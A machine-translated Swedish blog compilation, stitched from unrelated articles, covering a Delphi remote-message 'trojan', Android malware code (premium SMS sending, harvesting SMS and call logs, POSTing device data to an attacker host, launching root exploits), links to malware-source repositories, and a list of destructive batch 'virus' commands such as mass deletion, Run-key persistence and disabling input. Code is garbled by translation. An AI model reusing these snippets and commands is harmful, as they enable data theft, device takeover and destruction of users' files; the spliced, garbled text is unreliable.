Om du är intresserad av att se hur "Server-Client Programs" skrivs och hur de fungerar på ett verkligt exempel, föreslår jag att du läser inlägget till slutet. Det ska bli intressant!

Jag bestämde mig för att skriva ett exempelprogram i Delphi! Sedan är den enklare och väl lämpad för ett litet men verkligt exempel. När det gäller det formidabla ordet "" som jag nämnde ovan, här visar det sig verkligen vara en riktig trojan, men med en liten och ofarlig funktionalitet.

Du kommer att ta reda på vilken princip de är skrivna " ”Och hur de fungerar inifrån! Men det finns en "MEN" trojaner skriver inte, för - det kommer att beskrivas nedan. Eftersom i vårt exempel, " Server»En del av programmet kommer att väga mycket ( Detta är inte acceptabelt för en riktig trojan), och vi kommer inte att dölja det i systemet. I verkligheten, "Malware", är saker lite annorlunda.

De försöker utveckla serverns del av programmet med en liten storlek, ja, ungefär "100 KB" Plus - minus några KB. Och de gömmer det i systemet, så att det kommer att ta lång tid att leta efter det! ...

Men allt är exakt, utvecklingsprincipen är densamma! Och det här exemplet är perfekt för att förstå hur program fungerar enligt "Server - Client" -principen. Det är bara det att vi inte har rätt ton för att utveckla en trojan, men behöver vi det? Höger. NEJ!!! Vi är bra killar och vi kommer inte att hooligan!

Hur program fungerar enligt principen "Server - klient"

Enkelt och i ett nötskal ser bilden ut så här: Du kör på din dator “ Klient"En del av programmet har som regel ett" GUI ", det vill säga ett användargränssnitt (om klienten inte är en konsol)

Datorn du vill komma åt startar " Server»En del av programmet, det öppnar också en viss port på någon annans dator och syns inte i systemet.

Genom denna port upprättas anslutningar, i klienten anger du porten och IP -adressen för datorn som servern körs på, ansluter till servern och du kan säkert utföra några åtgärder på någon annans dator från din dator! Du kan också läsa mitt senaste inlägg och ta reda på:

Jag hoppas att jag förklarade det här, typ av förståeligt och på enkelt mänskligt språk! Om något inte är klart, med ett exempel, kommer allt att bli klart! Låt oss sedan bestämma vilka åtgärder som ska utföras på fjärrdatorn på grund av arbetet med vår lilla trojan!

Vad är funktionaliteten i detta exempel på programmet Server - Client.

Ärligt talat, i det här skedet, när jag funderade på vad jag skulle visa, tvekade jag på något sätt och kunde inte komma på något intressant! I allmänhet, låt det finnas funktionalitet från en möjlighet och otroligt enkelt:

- Användaren kommer att få ditt meddelande.

Jag ser ingen anledning att lägga till några andra funktioner. Sedan tror jag att det är tillräckligt för ett exempel och förståelse. Jag tror också att det inte är värt att skriva mycket kod, det som är nedan är tillräckligt för att titta på programmet inifrån!

Och för platsen för meddelandet kan vara vad som helst, det beror på fantasin hos den person som bestämde sig för att skriva trojanen och på hans kunskaper om programmering.

Tja, vi kommer att ha ett sådant skämt! En person som sitter vid en dator får plötsligt ett meddelande, till exempel

« Hej, jag roaming din dator»

kan du föreställa dig en persons reaktion? Jag tycker det är roligt, det skulle vara att se hans uttryck !!!

Utveckling av programmet enligt principen "Server - klient"

Låt oss gå ner till den roliga delen! Och vi kommer att börja med att utveckla själva " Server»Därefter skriver vi en klient för det! Jag kommer inte att förklara programkoden, jag kommer att ge exempel, men jag har ingen programmeringsblogg, och syftet med inlägget är att steg för steg visa processen för att utveckla sådana program av typen "Server - klient"

Serverutveckling!

Inledningsvis måste du lära "servern" att öppna någon port på datorn för att kunna ansluta till den från "klienten" i framtiden, och därefter lär vi dig att acceptera kommandon och utföra några åtgärder på datorn.

Låt oss öppna porten med följande kod, som är smärtsamt enkel:

Delphi / Pascal

procedur TForm1.FormCreate (Avsändare: TObject); börja ServerSocket1.Port: = 666; ServerSocket1.Active: = true; slutet;

procedur TForm1. FormCreate (Avsändare: TObject); Börja ServerSocket1. Port: = 666; ServerSocket1. Aktiv: = true; slutet;

Nu, om du startar programmet, visas det helt enkelt, ett tomt fönster utan knappar och andra element. Och viktigast av allt kommer portnumret "666" att öppnas på datorn. Det är till denna port som vi kommer att skicka kommandon till servern i framtiden, och det kommer i sin tur att behandla dem.

Låt oss under tiden se till att servern körs och porten är öppen, återkalla kommandot "netstat" och se resultatet.

Som du kan se på datorn öppnades verkligen porten med siffran "666" till följd av lanseringen av vårt program. Detta säger bara en sak, programmet fungerar och det är dags att lära ut " Server»Få ett meddelande.

Delphi / Pascal

procedur TForm1.ServerSocket1ClientRead (Avsändare: TObject; Socket: TCustomWinSocket); var komm: string; Börja komm: = socket.ReceiveText; if copy (komm, 1,12) = "MESSAGE_TEXT" sedan börja Radera (komm, 1, 12); ShowMessage (komm); slutet; slutet;

procedur TForm1. ServerSocket1ClientRead (Avsändare: TObject; Socket: TCustomWinSocket); komm: string; Börja komm: = uttag. ReceiveText; if copy (komm, 1, 12) = "MESSAGE_TEXT" då Börja Radera (komm, 1, 12); ShowMessage (komm); slutet; slutet;

Här är saker och ting som följer! Om servern tar emot ett kommando med namnet "MESSAGE_TEXT" ( Namnet kan vara valfritt) då fungerar "ShowMessage" -proceduren och visar meddelandet som följde med kommandot och lagras i strängvariabeln "komm"

Följaktligen skrivs texten i meddelandet in " Klient”Och det kan vara vilket innehåll som helst!

I andra frågor är detta utvecklingen av " Server Delen är över. Som ett resultat fick vi en fil " Server.exe"Lägg det åt sidan tills vi skriver" Kund»

Kundutveckling!

Vi kommer att ha en klient, av uppenbara skäl, med ett grafiskt användargränssnitt (GUI) och måste ha kontroller, knappar och inmatningsfält. Jag har den här typen av program:

Låt oss bestämma om alla element! Även om det är förståeligt, som de säger, kommer jag att förklara det för säkerhets skull.

— IP: Fält för att ange IP: n för datorn där servern körs.
— Hamn: Vi anger portnumret som servern hänger på.
- Anslut: Knapp för att ansluta till servern.
- Textmeddelande: Inmatningsfält för meddelandet som ska skickas.
- Skicka ett meddelande…: En motsvarande knapp för att skicka ett meddelande.
- Anslutningsstatus: Här kommer vi att ta reda på om vi är anslutna eller inte!

Delphi / Pascal

procedur TForm1.Button1Click (Avsändare: TObject); börja ClientSocket.Host:= IP.Text; ClientSocket.Port: = StrToInt (Port.Text); ClientSocket.Open; slutet;

procedur TForm1. Button1Click (Avsändare: TObject); Börja ClientSocket. Värd: = IP. Text; ClientSocket. Port: = StrToInt (Port. Text); ClientSocket. Öppen; slutet;

Du kan börja just nu, köra programmet och försöka ansluta till " Server»Men vi vet inte resultatet, oavsett om de är anslutna eller inte. Innan vi kontrollerar kommer vi att fixa detta och lära programmet att visa anslutningsresultatet.

Delphi / Pascal

procedur TForm1.ClientSocketConnect (Avsändare: TObject; Socket: TCustomWinSocket); begin Label4.Caption: = ("Kan ansluta till:" + IP.Text); Label4.Font.Color: = clGreen; slutet;

Och om alla strömmar misslyckades med att ansluta till servern, till exempel eftersom " Server"På fjärrdatorn startas inte och porten" 666 "är därför stängd.

Delphi / Pascal

Procedur TForm1.ClientSocketError (Avsändare: TObject; Socket: TCustomWinSocket; ErrorEvent: TErrorEvent; var ErrorCode: Integer); börja om ErrorCode = 10061 börja sedan ClientSocket.Active: = False; Label4.Font.Color: = clRed; Label4.Caption: = ("Det gick inte att ansluta till:" + IP.Text); ErrorCode: = 0; slutet; slutet;

procedur TForm1. ClientSocketError (Avsändare: TObject; Socket: TCustomWinSocket; ErrorEvent: TErrorEvent; var ErrorCode: Integer); Börja Om ErrorCode = 10061 då Börja ClientSocket. Aktiv: = Falskt; Etikett 4. Font. Färg: = clRed; Etikett 4. Bildtext: = ( "Det gick inte att ansluta till:"+ IP. Text); ErrorCode: = 0; slutet; slutet;

Låt oss nu se hur programmet fungerar. Till att börja med startar vi klienten, men startar inte servern för att kontrollera om meddelandet att den kommer att anslutas visas misslyckades.

Samlingen av skadliga Android -applikationer från vissa antiviruslaboratorier innehåller redan mer än 10 miljoner prover. Denna siffra väcker fantasin, men cirka 9 miljoner 995 tusen av dem byter namn på kopior av de ursprungliga virusen. Men om du analyserar källkoden för de återstående flera tusen skadliga proverna kommer du att märka att de alla är kombinerade från ett litet antal unika funktionsblock (flera modifierade och kombinerade på olika sätt).

Saken är att virmakers oftast driver mycket triviala uppgifter:

• skicka ett textmeddelande till ett betalt nummer;
• ta i bruk användarens konfidentiella information (telefonnummer, meddelandetexter, data från ett SD -kort och så vidare);
• samla in data om den infekterade enheten;
• ta besittning av administratörsrättigheter på enheten (för att installera program utan ägarens tillstånd eller för att av misstag inaktivera enheten);
• spåra inloggningar, lösenord och betalkortdata som användaren anger på webbplatser för internetbanksystem. Hur gör dom det? Låt oss försöka komma in i den mörka världen av mobil wyrmaking och se vad som händer där.

Skickar SMS

Vem använder:

• AdSms;
• FakePlayer;
• HippoSms.

Den vanligaste typen av virus är SMS -trojaner. Dessa virus skickar helt enkelt meddelanden till premiumpriser utan användarens samtycke. Det är ganska enkelt att skapa ett sådant program eller skriva om ett färdigt för det önskade numret. Och processen med att erhålla förmåner är extremt förenklad - till skillnad från till exempel spårning av bankdata.

Följande är det enklaste kodexemplet. Detta är den grundläggande funktionen att skicka SMS. Det kan kompliceras genom att kontrollera sändningsstatus, välja nummer beroende på abonnentens plats och sedan radera SMS.

Privat statiskt SendSms (String DestNumber, String SmsText) (// Försök att köra sendTextMessage -metoden för SmsManager -objektet (standardprogram för att skicka SMS för den aktuella enheten) med det minsta antalet parametrar: mottagarens nummer och meddelandetext försök (SmsManager. getDefault (). SendTextMessage (DestNumber, null, SmsText, null, null); return true;))

Var kan man leta efter viruskoden

I de allra flesta fall är telefonen infekterad genom installation av applikationer. Alla Android -applikationer finns som en fil med apk -tillägget, vilket faktiskt är ett arkiv. Du kan se innehållet med Android SDK, APK till JAR Converter och Java Bytecode Decompiler. Applikationsbyggnad (APK) består av följande delar:

• resources.arsc - resurstabell;
• res (mapp) - de faktiska resurserna (ikoner, etc.);
• META -INF (mapp) - innehåller filer med följande innehåll: resurscheckasummor, applikationscertifikat och beskrivning av APK -enheten;
• AndroidManifest.xml - all slags serviceinformation. Inklusive behörigheter som programmet begär innan det installeras för korrekt funktion;
• classes.dex - du har säkert hört att i Android -operativsystem körs all kod med hjälp av den virtuella Dalvik -maskinen (med version 4.4 visas ART -stöd), som inte förstår normal Java -bytekod. Därför finns det filer med tillägget dex. Tillsammans med de nödvändiga och användbara klasserna (som är ansvariga för programmets funktionalitet) innehåller den också skadliga (viruskoden som vi analyserar i den här artikeln).

Skriva användarinformation till en textfil

Vem använder:

• NickySpy;
• SmsSpy.

Det finns en kategori av virus som jagar efter användares personuppgifter. Deras verkningsmekanism är också enkel. De laddar antingen upp användarfiler till servern hos sin skapare eller samlar in data i txt (CSV, XML - inte nödvändigt). Intressanta för cyberbrottslingar kan vara kontakter av alla slag, meddelanden från olika snabbmeddelanden, mediefiler, etc.

SMS från infekterade användare är särskilt värdefulla för telefonnumren till avsändare och mottagare - de kan användas för att fylla på databasen för spamutskick. Mindre ofta används virus av detta slag för att infektera enheter hos specifika individer - nästa gång din flickvän bjuder in dig att testa en applikation skriven till henne (ay, caramba! - Ed.) På Android, tappa inte din vaksamhet :).

// Räkna antalet SMS på enheten arrayOfObject = (Object) localBundle.get ("pdus"); int j = arrayOfObject.length; // Bläddra igenom varje SMS i = 1 medan (true) (om (i> = j) bryts; // Skapa ett SMS -meddelandeobjekt SmsMessage localSmsMessage = SmsMessage.createFrompdu ((byte) arrayOfObject [i]); // Lägg till strängvariabler avsändarnummer, text och tid för SMS -sändning String MessageNumber = localSmsMessage.getOriginatingAddress (); String MessageText = localSmsMessage.getDisplayMessageBody (); long l = localSmsMessage.getTimestampMillis (); Date localDate = Date (l); Simple String MessageTime ("åååå-MM-dd HH: mm: ss"). format (localDate); // Forma en sträng från den mottagna data och skriv den till en textfil med användarmetoden WriteRec String MessageInfo = 7MessageNumber + "#" + MessageText + "#" + MessageTimeDate + ";" WriteRec (paramContext, "sms.txt", MessageInfo); // Gå till nästa meddelande i + = 1;) Det är också bekvämt att fylla i skräppostlistan från abonnentens samtal historia. Denna kod kan köras vid ett inkommande samtal: If (parmIntent.getAction (). Equals ("android.intent.action.NEW_OUTGOING_CALL")) (// Sätt abonnentens nummer i variabeln String phonenumber = paramIntent.getStringExtra ("android .intent. extra.PHONE_NUMBER "); // Skapa en sträng från numret och datumet för samtalet String PhoneCallRecord = telefonnummer +" # " + getSystemTime (); // Ring WriteRec () -metoden (dess kod anges inte här ), som lägger till en rad i en textfil med samtalshistorik WriteRec (paramContext, "phonecall.txt", PhoneCallRecord);)

Efter att informationen skrivits ner vidarebefordras den till "rätta händer". Koden nedan laddar ner samtalshistoriken till servern:

Private void uploadPhonecallHistory () kastar IDException (medan (true) (return; // Kontrollera om filen vi behöver finns om (! FileIsExists (/data/data/spyapp.pg/files/phonecall.txt ")) fortsätter; // Skapa ett objekt - filuploader UploadFiles localUploadFiles = new UploadFiles (); String uploadkeynode = getKeyNode ("uid", "uid_v"); // Kör metoden.advanceduploadfile (dess kod finns inte här) för att ladda upp filen till servern av "virusmakaren" localUploadFiles. advanceduploadfile (uploadkeynode, " / data / data / spyapp.pg / files / phonecall.txt");))

Insamling av information

Vem använder:

• DroidKungFu;
• DroidDream;
• den överväldigande majoriteten av alla liknande skadliga program.

I princip kan alla virustillverkare använda information om de enheter som infekterats av sina program. Det är väldigt lätt att få det. En array skapas med data om telefonens egenskaper (en fullständig lista finns i Android -utvecklarens guide) och skickas som en POST -begäran till ett PHP -skript (språket är inte grundläggande) på angriparens server, som behandlar data och lägger den i en databas för senare användning.

Private void reportState (int paramInt, string paramString) (// Skapa en array och lägg serviceinformation i den ArrayList UserInformation = new ArrayList (); UserInformation.add (new BasicNameValuePair ("imei", this.mImei)); UserInformation.add (nytt BasicNameValuePair ("taskid", this.mTaskId)); UserInformation.add (nytt BasicNameValuePair ("state", Integer.toString (paramInt))); // Om funktionen har parametern "paramString (kommentar)", lägg den i arrayen och dess if (paramStrng! = null) && (! "". equals (paramString))) UserInformation.add (new BasicNameValuePair ("comment", paramString)); // Skapa en HTTP POST -begäran med adressen till skriptet som samlar in data HttpPost localHttpPost = new HttpPost ("http://search.virusxxxdomain.com:8511/search/rtpy.php"); försök (// Lägg till vår datamatris till begäran och kör den med en standard HTTP-klient localHttpPost.setEntity (ny UrlEncodeFormEntity (UserInformation, "UTF-8"))); ny DefaultHttpClient (). execute (localHttpPost) .getStatusLine.getStatusCode (); lämna tillbaka; )))

Röta

Vem använder:

• DroidKungFu;
• DroidDream;
• RootSmart.

En av de mest frustrerande sakerna som kan hända med en Android -enhet är att rota den med ett virus. Efter det kan det skadliga programmet göra vad det vill med det: installera andra virus, ändra maskinvaruinställningar. Denna åtgärd utförs genom att sekventiellt starta bedrifter:

Private void RootFunc () (ApplicationInfo localApplicationInfo = getApplicationInfo (); / * "ratc" är en kopia av den berömda Rage Against The Cage root exploit. Kiall - stoppa alla processer som startats av den aktuella applikationen. Gjsvro - ett utnyttjande för att förvärva udev -rättigheter (används i Linux -system för utökat arbete med hårdvara och nätverksgränssnitt) Kopiera allt detta till rätt plats * / Utils.copyAssets (detta, "ratc", " / data / data" + localApplicationInfo.packageName + " / ratc"); Utils .copyAssets (detta, "killall", "/ data/ data" + localApplicationInfo.packageName + "/ killall"); Utils.copyAssets (detta, "gjsvro", "/ data/ data" + localApplicationInfo.packageName + "/ gjsvro "); // Och kör med kommandoraden Utils.oldrun (" / system / bin / chmod "," 4755 /data/data"+localApplicationInfo.packageName + " / ratc"); Utils.oldrun (" / system / bin / chmod "," 4755 /data/data"+localApplicationInfo.packageName+" / killall"); Utils.oldrun (" / system / bin / chmod", "4755 /data/data"+localApplicationInfo.packag eName + "/ gjsvro"); nya MyTread.start (); )

Webbplatser om mobil skadlig kod

Blogg för experter från företaget Kasperskiy Lab Denna resurs innehåller detaljerade artiklar av hög kvalitet om många aspekter av datasäkerhet, inklusive Android-virus. Det är värt att besöka denna webbplats regelbundet för att hålla dig uppdaterad om den senaste utvecklingen.

Gruppen är dedikerad till ett open source -verktyg för alla typer av manipulationer med koden för Android -applikationer (dekompilering och modifiering av DEX / ODEX / APK -filer, och så vidare). Androguard innehåller också en omfattande databas med artiklar om virus. Förutom korta granskningar av funktionaliteten och skyddsmetoderna finns det detaljerade analyser av skadlig kod.

Avsnittet Mobila hot på www.fortiguard.com Telefonvirus Encyclopedia. Varje artikel är en översikt över funktionaliteten, kryddat med en betydande mängd tekniska detaljer. Förutom information om hot mot Android -operativsystemet finns det artiklar om virus för Symbian OS, iOS och andra plattformar.

Virus skydd

Vissa användare tror att om du laddar ner program enbart från Google Play och installerar ett antivirusprogram på din smartphone, så garanterar detta 100% säkerhet. Lura inte dig själv: det finns regelbundna rapporter på webben om att skadlig kod finns på den officiella marknaden. Och antalet nyutvecklade skadliga program mäts i hundratusentals per månad, vilket gör det svårt för dem att komma in i databaserna för antivirusprogram i tid. En verklig säkerhetsgaranti kan tillhandahållas genom att manuellt se APK -filkoden innan du installerar den på telefonen. Du behöver inte vara en kodande guru för att upptäcka de skadliga fragmenten. Och vår artikel hjälper dig med detta.

Slutsats

Som vi kan se från exemplen skiljer sig mobila kablar inte åt i teknisk komplexitet. Naturligtvis är dessa exempel förenklade för att passa loggformatet - först och främst saknas fel- och undantagshanterare, liksom några tekniska detaljer, vars frånvaro inte hindrar dig från att förstå principerna för Android -skadlig kod, men kommer att skydda dig från onödiga experiment. Vi stöder inte skapandet av virus, eller hur? 🙂

Var kan jag ladda ner virusprover med källkod och detaljerade beskrivningar?

Att hitta en samling av aktuella virus, och ännu mer med en beskrivning och källkod, är ingen lätt uppgift. Vi har redan berättat var för analys och studier. Idag kommer jag att berätta om en annan källa där du kan hitta och ladda ner, men den här gången inte bara skadlig kod som finns på nätverket, utan körbara filer och källkoder för virus med detaljerad information.

I den här artikeln kommer du att lära dig om ett par intressanta projekt som erbjuder att dyka in i världen av källkoden för alla typer av trojaner, botnät, stjälare, maskar, etc.

• Förord
• Viruskällor
• TheZoo -projektet
• Malware -projekt

Varför och vem kan behöva virusprover?

Körbara filer och viruskällor kan behövas för att analysera den teknik som används av skadlig programvara, för att studera beteendet hos virus i systemet (övervakning av filsystemet, processer) och för att testa antivirus. Anställda på antivirusföretag är villiga att betala pengar för att få källkoden för ett nytt virus.

Är det lagligt att ladda ner virus?

Du kan ladda ner virusprover för studier och analyser på din dator, men du kan inte distribuera och infektera andra med dem. Mer om detta i artikel 273 i Ryska federationens strafflag.

Syftet med dessa projekt är att ge specialister från antivirusföretag och personer som är intresserade av virusanalys att förstå strukturen för den skadliga koden för skadlig kod.

Uppmärksamhet! Observera att de nedladdade filerna fungerar virus. Några av dem kommer att försöka infektera din dator. Kör aldrig de nedladdade filerna på din primära dator. Jag rekommenderar inte heller att du laddar ner virusprover utan omfattande kunskap om skadlig analys.

Under alla omständigheter bär inte webbplatsen www.site något ansvar för eventuella skador som du orsakar din egen och andras datorer.

Jag rekommenderar starkt att använda. Glöm inte skadliga maskar som försöker sprida sig och fly från den virtuella maskinen. För att undvika detta rekommenderar jag att du inaktiverar alla VM -gästtillägg, nätverksåtkomst etc. Du kan ta reda på hur du gör detta via länken ovan.

Viruskällor: theZoo Project

Låt oss börja vår recension med projektet theZoo, som översätts som en zoo (med humor är författarna bra). Det ligger i Githab -förvaret.

Målet med projektet är att göra studier av virus tillgängliga. Författarna samlar in och uppdaterar virusdatabasen. Med hjälp av theZoo kommer du att kunna komma åt populära skadliga prover.

Virusprover: TheZoo -projektet

Både den körbara filen och källkoden erbjuds för nedladdning och studie.

Hur använder jag theZoo?

Du kan använda theZoo -projektet på olika sätt: direkt från webbplatsen eller med hjälp av ett ramverk. Vi kommer att täcka båda sätten. Låt oss börja med den första.

Så gå till webbplatsen och se flera kataloger och filer.

Virus körbara filer finns i katalogen:

theZoo / malwares / Binaries /

I den hittar du den körbara filen för virusen. För varje enskild skadlig kod - en separat katalog som innehåller 4 filer: själva skadlig programvara i krypterad form i ett ZIP -arkiv, SHA256 och MD5 - arkivkontrollsummor för jämförelse och ett lösenord för det krypterade arkivet.

Viruskörbara filer: Trojan Androrat

Källkod för virus finns i katalogen:

theZoo / malwares / Source / Original /

Varje katalog innehåller fyra liknande filer. Allt är detsamma som med körbara filer.

Viruskällor: Trojan Dendroid

Det finns hjälp för varje enskilt prov, men du måste installera ett ramverk för att använda hjälpen.

För att installera theZoo -ramverket, använd kommandot:

git -klon https://github.com/ytisf/theZoo

Krav: urllib2, python3

Kommandon: sök, använd, hämta, info, lista alla, report-mal, update-db, exit. Läs mer om kommandon med hjälpkommandot.

Så vi har behandlat det här projektet, nu ska vi överväga ett annat.

Virusprover: Malware -projekt

Malware -projektet är också värd på Githab. Urvalet av virus är inte lika stort som i djurparken, men det uppdateras oftare. Bland det lilla antalet skadliga program kan du hitta källkoden för trojaner, botnät, ransomware, lösenordsstjälare och annat "bra".

Här är listan hittills:

• Alina Spark (Trojan)
• Bleeding Life 2 (Expolit -paket)
• Carberp (Botnet)
• Carberp (Bank Trojan)
• Crimepack 3.1.3 (Exploit pack)
• Dendroid (Trojan för Android)
• Dexter v2 (Trojan)
• Eda2, Stolich, Win32.Stolich (Ransomware)
• FlexiSpy (spionprogram)
• (Ramverk)
• GMBot (Android Trojan)
• Gozi -ISFB - (Bank Trojan)
• Grum (skräppostbot)
• Hacking Team RCS ()
• Dold tår
• KINS (Bank Trojan)
• Mirai (IoT Botnet)
• Ponny 2.0 (Password Styler)
• PowerLoader (Botnet)
• RIG Front-end (Exploit pack)
• Rovnix (Bootkit)
• Tinba (Bank Trojan)
• TinyNuke (Bank Trojan)
• Trochilus, RedLeaves (RAT)
• Zeus (bank trojan)

Viruskällkod: Malware Project

Låt oss till exempel gå till mappen Alina Trojan. Här erbjuds vi flera kataloger, bland vilka det finns källor. Dessutom lägger författarna i den nedre delen länkar till information relaterad till skadlig programvara.

här är instruktionerna för kommandona
assoc .exe = .mp3-Executors lanseras som musikmärke E: pridurok-skruv ändringar till idiotid 00: 00-ändringstid
datum 13.03.36-ändra datum assoc .lnk = .txt-ändra etiketterna i txt-filen kopiera% 0 F: \ Work.bat-kopiera objektet

1) Ett program för att radera filer från ett USB -minne (om det är isatt) och byta namn på det.
del F: \ *. * / q
etikett F: HACK
2) Ett program för att ändra datum och tid på en dator och kopiera det till C -enheten och till ett USB -minne.
tid 14:13
datum 11.07.12
kopiera% 0 C: \ Time.bat
kopiera% 0 F: \ Time.bat
----------
> nul-hide radkommando
% SystemRoot% / system32 / rundll32 user32, SwapMouseButton - byter musknappar
---------------
kopiera ""% 0 ″ ""% SystemRoot% \ system32 \ File.bat "
reg lägg till "HKLM \ SOFTWARE \ Microsoft \ Windows \ CurrentVersion \ Run" / v "Filel" / t REG_SZ / d "% SystemRoot% \ system32 \ File.bat" / f
reg lägg till HKCU \ Software \ Microsoft \ Windows \ CurrentVersion \ Policies \ Explorer / v NoControlPanel / t REG_DWORD / d 1 / f
Ett mycket grymt kommando: lägger till programmet till OS -start.
"Del x: \ y *. * / Q" - raderar alla filer på disken x i mapp y (utom mappar) (exempel del F: \ Data *. * / Q);
"Net user" x " / add" - lägger till en användare under namnet x till datorn (exempelvis nätanvändare "Rökt" / add);
"@Echo off" anges i början av vårt virus och döljer allt
rundll32 -användare, disableoemlayer - systemkrasch (!) - inaktivera alla I / O -funktioner (tangentbord, display, mus). Resultatet blir en svart skärm med en markör och ett system som inte svarar, men Windows fortsätter att köras.
del *. * / q (efter att ha kört detta kommando kommer alla filer utom mapparna i mappen där viruset startades att raderas !!!
md 1-skapa mappar
För att köra filen under Windows -start, byt namn på filen till Autoexec.bat
Echo Virus Loading-inskription på skärmen lodinvirus
del c: Program Files / q (tar bort alla filer från den här mappen)
reg - direkt arbete med registret. Titta på reg /? alla!
rcp - filutbyte via rcp i ascii
runas - på användarens vägnar
uppgiftslista - Visar program och sessioner som är associerade med den.
taskkill - låter dig döda en eller flera processer
tftp - trivial ftp
tskill - döda en process
reg - verktyg för att interagera med registret
bootcfg - boot.ini -inställning
lägg till - låter dig öppna fjärrfiler som om de fanns i den aktuella.
getmac - få mas
logoff - Slutanvändarsession.
mem - visa information om de aktuella processerna i RAM
mqbkup - arkivering
netsh - ??
openfiles - visa öppna filer.
rsh - kör kommandon på fjärrvärdar som kör rsh
sc - kommandorad ??
rexec - kör kommandon på fjärrvärdar som kör rexec
avstängning - avstängning (hehe) lokal eller fjärrdator.
systeminfo - visar information om datorn.
schtasks är en uppgiftsplanerare.
xcopy - kopiera filer och kataloger.
tsshutdn - avstängning av servern i föreskriven ordning.
set - visa, ställ in och ta bort miljövariabler cmd.exe. Systemegenskaper (pr.kn. "min dator") - valfritt - Miljövariabler. Alla variabler finns inte, men många! Allt att titta på är bara klart.
Förresten, här är några RunDLL -kommandon som kan användas för att skapa batchfiler

rundll32 -användare, wnetdisconnectdialog
Koppla från fönstersamtalet Network Network Drive

rundll32 -användare, disableoemlayer
Misslyckas med att provocera

rundll32 -användare, repaintscreen
Uppdatering (hur)

rundll32 -användare, setcursorpos
Maus-markören till vänster för att plantera

rundll32 diskcopy, DiskCopyRunDll
Fönstret "Kopiera disk"

rundll32 rnaui.dll, RnaWizard / 1
Dialog "Upprätta anslutning" -samtal (/ 1 = utan fönster)

rundll32 skal, shellexecute
Utforskare-Öppna fönstret i rotkatalogen

rundll32 shell32, OpenAs_RunDLL
Fönster "Öppna med ..." ring ***

rundll32 shell32, SHFormatDrive
Fönstret "Format: Disk3,5 (A)" -samtal

rundll32 shell32, ShellAboutA
Info-Box (om Windows) -samtal

rundll32 shell32, SHExitWindowsEx 0
Starta om Windows 98 (utan autoexec.bat etc.)

rundll32 shell32, SHExitWindowsEx 1
Avsluta arbetet med Windows 98

rundll32 shell32, SHExitWindowsEx 2
Windows-98-PC-start

rundll32 shell32, SHExitWindowsEx -1
Windows-98-Explorer startar om

rundll32 shell32, Control_RunDLL
Öppna fönstret "Kontrollpanelen"

rundll32 shell32, Control_RunDLL desk.cpl
Öppna "Skärmegenskaper"

rundll32 shell32, Control_RunDLL main.cpl
Öppna modulkontrollpanelen från MAIN.CPL **

rundll32 krnl386.exe, exitkernel
avsluta Windows utan några meddelanden / frågor

rundll32 -användare, swapmousebutton
Flytta musknapparna *

rundll32 -tangentbord, inaktivera
"Inaktivera" tangentbordstyp *

rundll32 mus, inaktivera
"Inaktivera" mus *

rundll rnaui.dll, RnaDial “leverantör”
Kalla fönstret "Upprätta anslutning" med namnet "leverantör"

rundll32 -användare, tilechildwindows
bygga alla icke-rullade fönster uppifrån och ner

rundll32 -användare, cascadechildwindows
bygga alla icke-rullade fönster i en kaskad

rundll32 sysdm.cpl, InstallDevice_Rundll
(endast möjligt i W98) Installera icke-Plug & Play-maskinvara

rundll32 msprint2.dll, RUNDLL_PrintTestPage
välj en skrivare i menyn som visas och skicka ett test till den

rundll32 -användare, setcaretblinktime
ställ in ny frekvens av blinkande förbannelser *

rundll32 -användare, setdoubleclicktime
ställ in ny dubbelknackningshastighet *

rundll32 setupx.dll, InstallHinfSection
DefaultInstall 130; C: \ file.inf
System omstart fönster. Spela det nu? ъ Ja / nej ъ ”****

ASSOC - Visar eller ändrar filtilläggsassociationer
AT - Schemalägg kommandon och program för körning på datorn.
ATTRIB - Visar eller ändrar filattribut.
BREAK - Ställer in eller avbryter kombinationskontroll.
CACLS - Visar eller ändrar åtkomstkontrollistor (ACL) för filer.
CALL - Ringer upp en * .BAT -fil från en annan.
CD - Visar namnet eller ändrar namnet på den aktuella katalogen.
CHCP - Visar eller ställer in det aktiva kodsidan.
CHDIR - Visar namnet eller ändrar namnet på den aktuella katalogen.
CHKDSK - Kontrollerar disken och visar en statusrapport.
CLS - Rensar skärmen.
CMD - Startar en ny instans av kommandotolkaren Windows NT.
COLOR - Ställer in standardfärgerna för konsolens förgrund och bakgrund.
KOMMANDO - Startar en ny kopia av kommandotolken i Windows.
COMP - Jämför innehållet i två filer eller uppsatta filer.
COMPACT - Visar eller ändrar komprimering av filer på patrician Windows NT (NTFS).
CONVERT - Konverterar FAT -volymer till Windows NT File System (NTFS) -format. Du kan inte konvertera den aktuella skivan.
KOPIERA - Kopierar en eller flera filer till en annan plats.
CTTY - Ändrar terminalenheten som används för att styra ditt system.
DATE - Visar eller ställer in datum.
DEL - Tar bort en eller flera filer.
DEBUG - Utför felsökning, testning av program och redigeringsverktyg.
DIR - Visar en lista med filer och underkataloger i en katalog.
DISKCOMP - Jämför innehållet på två disketter.
DISKCOPY - Kopierar innehållet på en diskett till en annan.
DOSKEY - Redigerar kommandorader, reparerar Windows -kommandon och skapar ett makro.
ECHO - Visar meddelanden, eller aktiverar / inaktiverar kommandoutmatning.
EMM386 - Aktiverar / inaktiverar EMM386 utökat minnesstöd.
ENDLOCAL - Avslutar lokalisering av miljöförändringar i en * .BAT -fil.
ERASE - Tar bort en eller flera filer.
EXIT - Avslutar programkörning (kommandotolk).
EXTRAKT - Ett verktyg för att extrahera information från CAB -filer.
FC - Jämför två filer eller filinställningar och visar skillnaden mellan dem.
HITTA - Söker efter en textsträng i en eller flera filer.
FINDSTR - Sök efter strängar i filer.
FOR - Utför det angivna kommandot för varje fil i en uppsättning filer.
FORMAT - Formaterar en disk för användning med Windows.
FTYPE - Visar eller ändrar filtyperna som används i tilläggslänkar.
GOTO - Dirigerar kommandotolken i Windows NT till den markerade raden i * .BAT -filen.
GRAFTABL - Windows förmåga att visa pseudo -grafiska symboler infogade i grafiskt läge.
HJÄLP - Ger hjälpinformation för Windows -kommandon.
IF - Utför bearbetning av ett villkor i en * .BAT -fil.
KEYB - Konfigurerar tangentbordet för det angivna språket.
LABEL - Skapar, ändrar eller tar bort en volymetikett på en disk.
LOADHIGH (LH) - Läser in programmet till adresser med högt minne.
MD - Skapar en katalog.
MEM - Visar mängden använt och ledigt minne på ditt system.
MKDIR - Skapar en katalog.
LÄGE - Konfigurerar systemenheten.
MER - Visar en skärm i taget.
MOVE - Flyttar en eller flera filer från en katalog till en annan på samma disk.
NETSTAT - Visar statistik för protokoll och aktuella TCP / IP -nätverksanslutningar.
NLSFUNC - Läser in landsspecifik information.
